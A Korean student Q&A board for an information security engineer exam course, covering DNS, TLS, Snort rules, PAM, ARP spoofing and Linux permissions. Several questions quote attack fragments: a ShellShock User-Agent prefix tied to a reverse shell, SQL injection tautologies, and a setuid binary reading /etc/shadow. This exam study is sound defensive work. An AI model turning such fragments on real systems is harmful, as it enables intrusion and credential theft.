안녕하세요? 덕분에 강의 잘 듣고 있습니다. 다름이 아니라 DNS쪽 강의를 수강중인데, DNS서버와 네임서버 차이점이 궁금합니다. 시험에서 답 작성시에 혼용하여 사용해도 괜찮은지도 궁금합니다. 예) Authoritative DNS / Authoritative 네임서버
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
29강 환경변수에서 현재디렉토리(".") 삭제
29강에서 PATH 경로에 현재 디렉터리를 지칭하는 "."을 맨뒤로 보내거나 삭제해야한다고 하셨는데, 끝에 추가하는 방법은 알려주셨는데 삭제하는 방법(명령어)이 궁금합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
Ssl 관련 mtls 관련하여
안녕하세요 회사에서 프로젝트하다가 mtls설정관련하여 애먹었던적이 있는데요. 저는 개발자고 당시에는 어플리케이션단에서는 변경사항이 없었고 엔진엑스웹서버쪽에서mtls통신하는 서버측의 인증서를 루트체인에 심는 조치를 취했었던걸로 기억납니다. (당사가 클라이언트입장) 해당조치 후 같은 서비스를 쓰는 일반 ssl통신하는 다른 고객사와 통신이 되지 않는 문제점이 발생했었습니다.(당사가 서버입장) Ssl 강의듣다가 질의내용이 생겼는데 1. 클라이언트 certificate request를 일반적으로는 요청하지 않는데 요청하는게 mtls인가요? 2. Mtls와 tls 를 혼용해서 1개의 서비스를 운영하는게 가능한가요? 3. 당시 mtls서비스를 위해 보안팀에서 mtls용 인증서를 별도구매해서 기존도메인에 적용했는데 tls1.3v 이상 이었고 이때문에 기존통신되던 서비스와 통신이 되지않았던거 같은데 mtls는 무조건 tls1.3v 이상이어야 하나요? 기존인증서로도 어떤 조건만 만족시킨다면 mtls통신이 가능할수 있나요? 4.가령 자바어플리케이션이라고 하면 jdk버전이 있고 이에따른 통신프로토콜 버전 제어와 지원가능한 cipher suite가 있는데 이것과 도메인 인증서는 어떤연관이 있고 어플리케이션단에서 최대한 많은 도메인과 통신이 가능하게 하려면 (클라이언트, 서버 입장 모두) 어떻게 해야하나요? 5. 자바어플리케이션이 많은 도메인과 통신하는 클라이언트 입장일때 해당서비스에 적용되어 있는 당사인증서는 통신할때 아무런 영향을 미치지 않는게 맞나요?제가 이해한바로는 그래서요. 근데 이것 또한 당사 보안설정이나 기타 다른 영향을 받을수 있나요?? 강의와 연관이 없을 수 있는데 지식이 부족한 상황에서 여러가지 혼재되어 있어 답답해서요ㅠ 답변해주실수 있는 부분만 부탁드리겠습니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
snort 관련 질문이 있습니다.
선생님 안녕하세요 좋은 강의 감사드립니다. snort content 옵션에서 " " 사이에 있는 텍스트 형식을 검사할수 있다고 하셨는데 왜 교재 486 페이지의 예시에 나와있는 "+or+" 와 "%27%3D%27" 문자열이 문자열 그대로 검사되지 않고 URL 인코딩되어 검사되는지 여쭤봐도 될까요? 감사합니다~!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
수강일이 이번주 까지인데 연장은 안되나요?
개정된 법률부분 올려주신다고 하셨는데 수강일이 이번주까지여서 못들을것같아 질문 남깁니다. 혹시라도 정리된 파일이라도 미리 올려주셨으면 감사하겠습니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
ShellShock 관련 질문
리버스쉘 연결을 위한 HTTP 요청헤더에서 User-Agent : () {:;} ; 이부분에 중괄호 사이에 콜론(:)이 꼭 있어야 하는 건가요? 필요하다면 역할이 뭔지 궁금해요
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
7강: 프로세스 이미지 전이 및 fork에 대한 궁금증
고생하십니다. 8강을 듣던 중 fork를 통해 복사본 프로세스를 생성 후 exec 계열 함수 실행 시 login shell에서 a.out으로 프로세스 이미지가 전이가 된다고 말씀하셨는데, 이것이 정확히 어떤 의미인지 잘 모르겠습니다. 또한 fork를 통해 복사본 프로세스 생성 시 터미널 제어권이 자식 프로세스로 넘어간다고 하셨는데, 이것은 a.out을 실행했을 경우 자동으로 fork()되면서 a.out에 대한 카피 프로세스가 생기면서 터미널 제어권이 넘어간다는 뜻인지, 아니면 이용자가 fork 하는 경우 그냥 터미널 제어권이 넘어간다는 뜻인지도 궁금합니다. 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
4회 실기 준비중인데 23년 강의 법 부분 수강 안하는게 낫나요?
4회 실기 준비중인데 23년 강의 법 부분 수강 안하는게 낫나요? 개정법 반영은 안되어있는거죠?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강사님 항상 고생많으십니다! DNS 서버보안관련 질문입니다.
DNS서버의 보안성을 높이려면 Recursive Query를 제한해야하고 그로 인해 recursion no 옵션을 적용해 Recursive Query를 제한 또는 허용 하지 않는 쪽으로 설정해야한다고 이해를 했습니다. 이 항목이 Authoritative 네임 서버나 제한적으로 사용할 Recursive 네임서버에만 적용되는 것일까요? 제가 이해한 바로는 이러한 보안 설정을 일반 Recursive 네임 서버(KT,Google)에 적용하면 일반사용자들은 해당 DNS서버를 사용 못하는 것이 되는 것인거죠?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
수강시 리눅스는 어떤게 좋을까요?
강의중 말씀하신 것처럼 이해하면서 보고 있는데요. 그래도 실습할 때나 복습시 따라하는게 좋을 것 같아서 가상머신 만들려합니다. 권장하시는 리눅스는 어떤건가요? 레드헷 계열인지 아님 데비안계열인지라도 알려주세요. 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
PAM 활용예 1관련하여 질문드립니다.
인강을 보며 실습하고 있습니다. /etc/securetty파일 내용에 vc, tty, pts 이렇게 있는데 vc는 무엇인지 궁금합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
해결되었습니다.
해결되었습니다
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
p.549 침해사고 유형별 시나리오 > 리버스 쉘 > 상세동작방식의 이해 질문
공격자와 웹서버 둘다 nc를 사용하는데 왜 공격자 호스트에선 소켓이 3이상의 fd를 할당받고 웹서버 호스트에선 0,1,2가 소켓파일로 redirect됐나요? * '할당=해당 파일디스크립터(fd)가 특정 파일을 가리킨다.'의 표현을 썼습니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
6강 perm관련(24p)
24p 실습화면 보면 suid.dat 파일이 있는데 왜 -perm 4000 할때 저 파일이 표시가 안되나요?? suid만 설정되어있는거 아닌가요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
DNS 스푸핑도 스위치환경에서 스니핑이 가능하지 않나요?
왜 DNS 스푸핑은 정답에 포함이 안되나요? 지속적으로 스니핑하기 힘들기 때문인가요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
dns관련 질문
nslookup 하고 server ns1.google.com으로 지정하고 www.google.com 하면 응답이 안오 는데 nslookup www.google.com ns1.google.com 하면 응답이 옵니다 둘의 차이점이 무엇인가요?? 그리고 nslookup [google외 다른 도메인이름] ns1.google.com 하면 응답이 안오는데 이는 recursion no 와 같은 설정을 해줬다고 이해하는게 맞나요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
개인정보보호법 개정에 따른 실기 준비 가이드 요청건
안녕하세요 최근 개인정보보호법이 9월 15일에 개정되었습니다 이번 실기에서도 나올 것 같은데 별도 준비 가이드가 필요할 것 같아 요청드립니다 23년 마지막 시험에 목숨걸고 임하겠으니 많은 도움 요청드립니다
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
라우터 보안 설정 관련 질문입니다.
안녕하세요, 교수님 2022 알기사 정보보안기사 실기 문제편(2권) 420번 관련 질문드립니다. (2) 'priviledge 모드로 들어가는 패스워드 2222 암호화하여 지정' 부분에 대한 답변 작성 관련입니다. [정답] 뿐만 아래의 [본인의 답안]도 정답으로 고려될 수 있는가 궁금하며, 두 답안 사이에 차이점이 있는지 궁금합니다. [정답] # conf t (config) # enable password 2222 (config) # enable password-encryption [본인의 답안] # conf t (config) # enable secret 2222 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
Slow HTTP POST Dos 관련 질문
안녕하세요, 교수님 2022 알기사 정보보안기사 문제편(2권) 412번 문제 관련 질문입니다. 2) 판단의 근거를 찾는 과정에서 content-length가 매우 크게 설정되어 있음은 확인하였으나, 'TCP 패킷을 보면 약 10초 후(천천히)에 1byte(소량씩)의 데이터를 전송하고 있다.'라는 부분을 캡처한 이미지에서 찾지 못 했습니다. 이미지의 어디를 보아야 해당 근거를 찾을 수 있는가 궁금합니다. 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
ICMP redirect 공격 관련 질문
안녕하세요, 교수님 2022년 알기사 문제편(2권) 345번 질문드립니다. 2) 문항에서 '외부 네트워크의 호스트를 목적지로 하는 주소(172.16.18.13)의 gateway주소가 디폴트 라우터의 주소가 아닌 특정 호스트의 주소로 설정된 것으로 보아 ICMP redirect 공격으로 판단된다'라고 적혀 있습니다. 여기서, 172.16.18.13를 본 후 어떻게 외부 네트워크 인지 판단할 수 있는지 궁금하여 질문드립니다. 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
arp 스푸핑 관련 질문
안녕하세요, 교수님 2022년 알기사 문제편(2권) 206번 질문드립니다. 문제들 중 ARP 스푸핑과 ARP cache poisoning이 공존하는데 둘은 같은 의미인지, 종속관계인지 궁금하여 질문드립니다. 해당 문제에서 ARP cache poisoning으로 답변을 작성해도 되는가 궁금합니다. [개인적인 이해] - ARP 스푸핑: 공격자가 다른 호스트의 MAC 주소를 자신의 MAC 주소로 위조 - ARP cache poisoning: 공격자가 다른 호스트의 MAC 주소를 자신의 MAC 주소로 위조하여 희생자에게 전송한다. 해당 작업으로 인해 희생자의 ARP cache table이 조작되어 희생자가 조작된 MAC 주소인 공격자에게 전송한다. => 종속관계: ARP 스푸핑(큰 범위) > ARP cache poisoning(작은 범위)
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
TCP SYN Flooding 공격 대응책 질문드립니다.
안녕하세요. 강사님 TCP SYN Flooding 공격 대응책 5가지 중 SYN +ACK에 대한 대기시간을 줄이는 것이 왜 대응책에 해당되는 것인지 궁금합니다. 가이드에 나온 대응책이라 실무적으로 사용하지 않는다고 하셨는데 다른 4가지는 이해할 수 있었는데 이것만 이해가 잘 안됩니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
쉘쇼크 관련 질문
안녕하세요. 2022 알기사 문제편(2권) 737번 관련 질문드립니다. (C)에서 쉘쇼크 취약점을 이용하여 타겟 웹서버에 리버스 쉘 연결을 위한 공격을 하고 있다고 되어 있는 부분에 대한 이해가 어렵습니다. 박스로 된 로그를 어떻게 해석해야 '리버스 쉘 연결을 위한 공격'을 유추할 수 있는지 궁금합니다. 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
패킷 필터링 네트워크 방화벽 정책 관련 질문
안녕하십니까 2022년 알기사 실기 문제편(2권) 728번 관련 질문입니다. (4)의 TCP 플래그에 ACK로 설정 제한을 해야하는 이유에 대한 해설이 이해되지 않아 질문드립니다. [본인의 해석] - 출발지 포트: 25/tcp, 목적지 포트: 8080/tcp(허용하지 않는 서비스)로의 연결이 가능 - 내부 서비스(목적지 포트)에 대한 연결은 출발지 포트(25/tcp) 중에서도 허용한 (목적지 포트로의) 연결 외에는 차단 - 즉, 25(출발지) -> 1024 - 65535(목적지)가 허용된 상태인데 목적지 전체가 아닌 일부 허용된 포트만 tcp 연결 설정을 통해 제한한다. 제가 해석한 바는 위와 같은데.... 해당 해석 검토를 요청드립니다. 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
pam_tally2.so 공부 중 질문이 있습니다.
안녕하세요. 정일영 교수님. 좋은 강의 감사합니다. 다름이 아니라 pam 모듈과 관련하여 공부 중이였는데, 문득 궁금한 점이 생겼는데 따로 찾아보았지만 관련된 정보들을 찾기가 어려워 질문을 드립니다. pam_tally2.so 모듈은 기본적으로 no_magic_root 를 포함하기 때문에 root 계정은 잠기지가 않지만, root 계정을 잠그기 위한 방법과 잠김을 풀기 위해서는 어떤 방법이 있을까요? 좋은 강의 정말 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
선생님! 숫자 0을 ○에 \을 결합하여 표현하시는데요..
혹시 실기시험에서 0이란 숫자를 저렇게 적어야하나요? 제가 노베이스라서요... ㅠㅠ
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
smurf 공격은 왜 DRDoS로 분류되지 않나요?
1.출발지 IP를 희생자 IP로 위조함, 2.ICMP Echo Request < ICMP Echo Reply (요청대비 응답 큼) 3.반사, 증폭 네트워크를 이용함 이렇게만 봤을땐 DRDoS를 만족하는 것 같은데 왜 서비스거부 공격(DoS)에 분류되어있는지 궁금합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
47강 ifconfig 명령어 관련해서 질문 드립니다.
먼저, 실습이 불가능한 상황이라 질문드립니다. ifconfig 명령어 관련 설명에서 promiscous 모드 설정을 root계정 및 root권한을 가진 계정이 아닌 일반 사용자도 가능한지가 궁금합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
맥주소는 변경이 불가능한 것인가요?
안녕하세요. 정일영 교수님. 최근, 인터넷 기기를 이용하여 여러 강력 범죄들이 일어나고 있는데 이와 수업시간에 알려주신 맥주소와의 연관성에 궁금증이 생겨 질문을 올리게 되었습니다 보통 악의적인 글의 작성자를 찾기위해 ip주소를 추적하는 것으로 알고 있습니다. 그런데 ip주소는 우회가 가능하여 아직까지 검거되지 않은 케이스들이 많다고 들었습니다. 그럴 바에 변경 불가능한 맥주소를 추적하는 것이 수사에 효과적이지 않을까라는 의문이 생겼습니다. 그래서 수사는 왜 아이피주소 추적에 의존하는지, 맥주소 추적을 활용할 수 없는지에 대해 알아보았습니다. 그 결과 인터넷에서, "맥주소는 변경이 매우 쉬워 추적하기 힘들다 "라는 이유를 찾았습니다. https://netxhack.com/network/mac-address-trace-evidence/ 교수님께서 33강 시작부분에 mac은 변경 불가능하다고 하셨습니다. 저도 그렇게 알고 있습니다. 하지만 이는 제가 찾아본 내용과 모순 되는 부분입니다. 수업과 큰 관련이 없는 것에 대해 질문하는 것은 죄송합니다. 하지만, 제 의문에 대해 설명해주신다면 mac 이해에 크게 도움이 될 것 같습니다 감사합니다. 학생 올림
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
사용가능기기 대수 초과로 나오는데 정정 부탁드립니다.
사용가능기기 아마 탭이랑, 데스크탑으로 등록된 거 같은데. 탭을 지워주시면 감사하겠습니다..휴대폰으로 이동시 수강하려고 합니다. 확인 부탁드립니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
section 78, SQL injection 실무형 기사 문제 예시 질문
강의 40분쯤에 실무형 기사 문제 예시에서 (2)번 문제(조건식이 하나일때)를 풀때 정답으로 그냥 a'='a 이렇게 쓰면 안되나요? 굳이 ' or 을 앞에 꼭 붙여야하는 이유가 있나요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
16강. 016.UNIX/Linux기본학습_15(신규) 강의 질문
16강. 016.UNIX/Linux기본학습_15(신규) /(1권)p56~59 강의의 23:05초에서 no_access에서 윈도우 xp의 ip대역인 192.168.56.20을 설정해주셨는데, 그 뒤에 실습에서는 윈도우 xp에서 192.168.56.100으로 접속을 시도 했는데 접속이 불가능하다고 실습으로 보여주셨습니다. 그런데 no_access는 차단할 특정 ip를 적어준다고 말씀하셨는데, 저 ip가 왜 차단이 된 건지 알고 싶습니다..
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
arp request를 받는 쪽도 자신의 ip를 물어보는 것이 아니라더라도 arp cache를 갱신하나요?
arp reply를 받은 컴퓨터가 arp cache를 갱신하는 것과는 별개로 arp request가 브로드캐스팅될 때, arp request를 받은 각 컴퓨터는 자신의 ip를 물어보는게 아니더라도 arp cache를 갱신하나요? arp request에 sender mac과 sender ip가 있으니까 그 편이 더 효율적일 것 같아서요 아니면 GARP request를 브로드캐스팅 할때만 자신의 ip가 아니더라도 arp cache를 갱신하는 건가요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
switch jamming(mac flooding) VS switch poisoning
switch poisoning은 mac table을 가짜 mac주소로 꽉차게 함으로써, 어떤 frame이 switch에 도착했을 때 mac table에 매칭되는 mac주소가 없는 경우 브로드캐스팅하는 스위치의 특성을 이용하여 스니핑을 하는 공격으로 알고 있습니다. 제가 궁금한 것은 switch jamming과 switch poisoning이 같은 공격을 의미하는 것인지, 아니면 서로 다른 공격을 의미하는 것인지 궁금합니다. +만약에 둘이 같은 공격이라면, fail/open정책이라는게 mac table에 매칭되는 mac주소가 없을 때 frame을 브로드캐스팅하는 것을 의미하나요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
ESP 프로토콜 질문
선생님 안녕하세요 이론교재의 269pg ESP 프로토콜의 동작모드 그림과 문제풀이편 209pg 344번의 ESP 그림이 달라서 어떤걸 기준으로 잡고 외워야할지 모르겠습니다. 이론 교재 기준으로 외우고 해당 문제를 접했더니 DATA 라고 되어있는 부분이 이론교재의 그림에서 어느 부분을 말하는건지듀 모르겠고 이론교재 기준의 답과 문제의 답이 상이한 부분이 있어서 질문드립니다, 이론교재에서는 ESP그림에서 ESP-H , Original IP-H 라고 표현하는데 문제에서는 처음보는 TCP Header, IP header, Data라는 부분이 나옵니다. 이론 교재를 기준으로 잡고 외우고 싶은데 문제를 보니 풀수가 없네요.. 설명부탁드립니다. 선생님. 추가적으로 해당 문제편 그림을 무시하고 이론 그림 기준으로 해당 문제 답을 이론문제 그림을 그리고 예를들어 2)번 정답도 암호화가 적용되는 필드의 범위를 Original IP-H , IP payload, ESP-T 이렇게 쓰면 틀릴까요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
snort threshold 질문
안녕하세요. snort threshold 에서 seconds가 정확히 무슨 의미인지 궁금합니다. 예를 들어서, threshold: type threshold, track by_src, count 10, seconds 1 이라고 할 경우 도착지 IP 기준으로 1초 동안 10번째 이벤트마다 action을 수행한다. 라는 의미인데 만일 10(시):00(분):00(초)부터 탐지를 시작했다면 10:00:00~10:00:01 딱 처음 1초 동안만 10번째 이벤트마다 수행하고 10:00:01~이후부터는 아예 이벤트 수행을 안한다는 의미인가요 ? 아니면 그냥 count에 대한 기준일 뿐인가요? 1초기준으로 10번째 이벤트에만 수행하고 1초가 지나버리면 다시 카운트가 초기화되어서 1부터 count가 시작되나요? 다시 말하자면 10:00:00~10:00:01 동안 count가 1에서 9까지 증가했는데 10은 도달하지 않았고 10:00:01이후가 되었다면, count는 다시 1부터 시작해서 이벤트 action자체를 수행하지 않게 되나요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
[강의 동영상 26강] 레이스컨디션 공격에서 임시파일
코드를 보면 fopen(argv[1], "w")으로 그냥 파일만 open해준 것 같은데 레이스컨디션 공격의 조건이 그냥 파일을 생성하는 setUid가 설정된 실행파일이 아니라, "임시파일"을 생성하는 setUid가 설정된 실행파일 인 이유가 무엇인가요? 일반파일을 생성할 때는 레이스컨디션 공격이 불가능한 건가요? +임시파일의 뜻이 정확히 뭔가요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
안녕하세요 교재 관련해서 질문있습니다
제가 22년도 알기사 교재밖에 없어서 요걸로 강의와 함께 공부중인데 뒤쪽에 정보보안일반관리 부분이 22년도 교재와 강의(23년도교재로 추정) 내용이 많이 다르네요.. 23년도 교재가 꼭 필요할까요.. ?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
TTL로 운영체제 판별할 때
TTL=64, 128, 255로 운영체제를 판별하는데 ping 을 보냈을 때 나타나는 TTL은 송신 호스트의 운영체제를 뜻하나요? 아니면 수신 호스트의 운영체제를 뜻하나요? 예를들어, 리눅스에서 유닉스로 ping을 보냈을 때 TTL은 64로 나오나요? 128로 나오나요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
131강 CGI 서비스 관련 질문드립니다.
안녕하세요 131강 CGI 서비스 관련 질문드립니다. 공격자가 해당 홈페이지가 CGI 사용되고 있는 서비스인지 어떻게 확인 할 수 있나요 !?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
아파치 웹서버 로그 설정 질문
안녕하세요. 아파치 로그 관련 설정에서 이론편 p.432를 보면 CustomLog logs/access_log combined 라고 되어있는데 실습화면에는 /etc/httpd/logs/access_log 라고 보입니다. 뒤에 combined는 무슨 의미인가요 ?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
Snort 룰 threshold type threshold 와 both의 차이 질문
Snort룰에서 type옵션중 threshold 와 both의 차이 질문합니다. threshold:type threshold, track by_dst, count 10, seconds 10 threshold:type both, track by_dst, count 10, seconds 10 위 와같은 룰이 있는 경우 type threshold는 매10초간 10번째 이벤트마다 action을 수행하고 type both는 매10초간 10번째 이벤트시 한번 action을 수행한다고 설명을 해주셨는데 만약 100초간 같은이벤트가 1초마다 발생되는경우 threshold는 100초간 같은 이벤트가 10번째 마다 10번 action이 수행되고 both는 100초간 같은 이벤트가 발생된다고 해도 10번째 이벤트에서 1번 action이 수행되는게 맞나요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
robots.txt allow, disallow 설정 우선순위 여부
robots.txt 설정 파일에서 allow, disallow를 설정할 때 다른 접근제어 파일 처럼 우선순위가 없나요? 책에서 Disallow: /search 로 되어있는데 Allow: /search/about 라는 구문이 뒤에 따라오면 allow가 적용되는 것으로 설명해주셨습니다. 그런데 /search/about이 /serach의 하위 인 것으로 보이는데, 위에서 차단설정을 했는지와 상관이 없는건가요? 아니면 상위디렉토리 및 경로보다 더 세분화되어있는 하위디렉터리 및 경로가 더 우선되는 규칙이 있는 건가요? Allow: /search/about Disallow: /search 처럼 순서를 반대로 설정한다면 allow에서 허용되던 /about도 disallow에서 다시 차단이되는지 그런 점이 궁금합니다. 우선순위가 어떻게 되는 건가요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
아파치 웹서버 httpd.conf에서 접근제어 설정
안녕하세요. httpd.conf에서 접근제어를 설정할 때 allow deny from에서 아이피가 아닌 맥주소로도 접근제어 설정이 가능한가요? 궁금합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
ACL과 iptables의 차이점
안녕하세요. 강의 중 궁금한 점이 생겨 질문드립니다. ACL과 iptables의 기능은 동일한거 같은데 차이점을 아래와 같이 이해하면 되는지 궁금합니다. ACL : 네트워크 장비(라우터 등)에서 패킷 필터링 수행 iptables : 서버 및 리눅스와 같은 운영체제에서 사용하는 방화벽으로 패킷 필터링 수행 즉, 사용되는 위치에 따라 구분된다고 생각하면 될까요? 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
snort정규표현식 관련 옵션 질문입니다.
정규표현식과 관련옵션(교재 486)에서 수량자 *의 예시 내용이 이상해서 질문드립니다. - * : 앞에오는 문자가 0회이상 나타남 예) He*llo : Hllo(0), Hello(0), Heello(0), Hallo(x), ello(x) 여기서 * 앞에오는 문자가 e와H니까 e 또는 H가 0회 이상만 나타나면 되는 걸로 이해 했는데 ello도 그럼 e 나 왔으니까 맞고 Hallo도 h 있어서 맞는거 아닌가요 ? 어디서 잘못 이해한건지 확인부탁드립니다. 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
MAC, HMAC에 대한 질문입니다.
MAC 메시지인증코드로 알고 있는데, HMAC이나 MAC나 결국 둘다 헤시함수를 통해 무결성(integrety)을 입증하는 건가요? 그리고 송신측에서 해시함수를 통해 일정한값 생성후 해시 알고리즘과 함께 헤시된 값을 같이 보내서 송신측에서 확인하는걸로 알고있는데 이때 일치하는 송신측에서 보네는 데이터와 일치하는지 어떻게 확인하는건가요? 원본데이터도 같이 송신자에게 헤시값이랑 같이 보내서 헤시함수를 돌려서 확인하는건지 궁금합니다. 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
grep에 "" 쓸때와 안쓸때 차이점
grep을 할 때 어떤 것은 " " 없이 단어만 적고, 긴 문장은 " "으로 표현하는 것처럼 보입니다. 짧은 단어는 ""안에 적으면 안되나요? ex) ~~~ | grep GET << 이렇게 말고 ~~~ | grep "GET"으로 안적는 이유는 뭔가요? ~~~ | grep "GET /home~~"
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
이론편 p.170 TCP 세션 하이재킹 seq, ack 질문
seq=받은 패킷의ack ack=이전 seq+이전len 서버->클라이언트 "seq:5, ack:5, len:390" 클라이언트->서버 "seq:5, ack:395, len:0" (여기서 seq, ack는 이해갑니다) 공격자->서버 "seq:5, ack:395, len:4" (공격자가 seq 재전송으로 처음 서버가 클라이언트에게 보낸 패킷을 참조해서 seq:5, ack:395, 데이터4 추가해서 보낸걸로 이해갑니다) 서버->클라이언트 "seq:395, ack:9, len:5" (seq는 이전 패킷의 ack니까 395, ack는 이전패킷의seq+len이니까 9가 된건 이해갑니다. 그리고 데이터5추가해서 보낸거로 이해합니다.) ## 그런데, 클라이언트와 공격자가 똑같은 seq넘버를 이용해서 여러번 보내도 되나요? 서버가 응답을 주기 전이니까 상관이 없는건가요? 클라이언트->서버에게 len:0으로 보낸 패킷은 왜 ack를 전송하지 않는지 궁금합니다. 클라이언트->서버 "seq:5, ack:395, len:0" (클라이언트는 len을 0으로 전송했으나, 공격자에게서 ack=9로 온 것에 정정하려고 보낸거로 이해합니다. 즉, 본인이 보냈던 이전 패킷을 재전송한것으로 생각합니다.) 서버->클라이언트 "seq:400, ack:9, len:0" ## 여기서 서버의 seq가 왜 증가했나요? 이전 클라이언트가 서버에게 ack패킷을 교정했던것과 똑같은 원리라면, 본인이 이전에 보냈던 패킷 "seq:395, ack:9, len:0"으로 보내야 하는 것 아닌가요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
-perm -2 라고 할 경우는 뭔가요?
주정통 취약점분석 가이드를 보면 world writable 을 찾기 위해서 -perm -2로 찾게 되는데 -perm -2가 -perm -222 라는 의미인가요? +, -, 부호없음 < 의미는 알고 있습니다. 다만 단순히 숫자 하나만 적는 2가 무엇인지 궁금합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
개인정보보호법 개정 관련
이번 실기(23.07.29) 준비 중인데요~ 개인정보보호법이 개정된다는 뉴스를 봤습니다. 혹시 이번 시험에 영향을 끼칠까요? 끼친다면 개보법 부분 강의 내용을 수험생 입장에서 어떻게 공부해야 할 지 궁금합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
./suid_01 이 무슨 의미인가요?
현재 suid, sgid 파트 강의를 듣고 있습니다. 리눅스 명령어에서 ./suid_01 을 입력하면 suid_01이 실행되는 것으로 알고 있는데 앞에 .를 적는 이유는 뭔가요? 현재 디렉토리라는 의미인가요? 아니면 숨김파일이라는 의미인가요? ls -al 을 통해 보았을 때, 앞에 .가 없이 /suid_01로만 적혀있었습니다. 그리고 리눅스 명령어에 ./suid_01 /etc/shadow 를 입력 했을 때, 명령어가 순차적으로 실행되므로 ./suid_01에서 suid,sgid 권한상승으로 인해 root권한으로 /etc/shadow파일을 읽어드렸다는 의미로 받아들이면 되는 건가요? 다시 정리하자면, /suid_01 /etc/shadow 라고 하지 않고 ./suid_01 /etc/shadow라고 하는 이유가 궁금합니다. 앞에 .을 왜 꼭 붙어야 하나요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
salt를 이용한 레인보우테이블 공격 대응 방법 궁금증
h(평문 패스워드 + salt) = 저장되는 암호화된 패스워드 만일 여기서, salt와 조합하여 해시한 해시값을 통해 평문을 알아내게 된다면 이 값은 평문 패스워드와 salt를 결합한 해시값의 평문이라는 것을 알고 있습니다. 그런데, 평문 패스워드와 salt를 결합한다는 것은 평문 패스워드의 뒷 부분에 salt를 단순히 이어붙인다는 것이 아닌가요? 그렇다면 /etc/shadow 파일의 비밀번호 필드에 나타난 salt값을 통해 알아낸 해시값의 평문 - salt 값을 제거하면 원래 평문 패스워드가 되는 것이 아닌가요? 해시함수 알고리즘처럼 평문 패스워드와 salt를 결합하는 방식이 또 다른 함수가 적용되는 건가요? /etc/shadow 파일의 비밀번호 필드 2번째 값에서 salt값을 확인할 수 있는데 왜 알아낸 평문 패스워드에서 salt값을 제거하지 못하는지 이해가 되지 않습니다. 궁금합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
질문드립니다!
안녕하세요 공부하던 중 궁금한 것이 있어서 질문 남깁니다 1. find / \(-user root -perm -4000\) 이 표현이랑 find / -user root -perm -4000 표현이랑 같은 의미인가요? 2. find /home \( -type f -a -perm -2\) -print 의 의미가 /home 디렉터리 이하 일반파일중 기타 사용자에 쓰기권한이 있는 파일을 출력한다는 의미인데 기타 사용자라는 의미가 어떤 부분인가요? -2는 쓰기권한으로 이해하는게 맞나요? -a옵션은 어떤 의미인지 궁금합니다
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
재귀적 질의 질문드립니다.
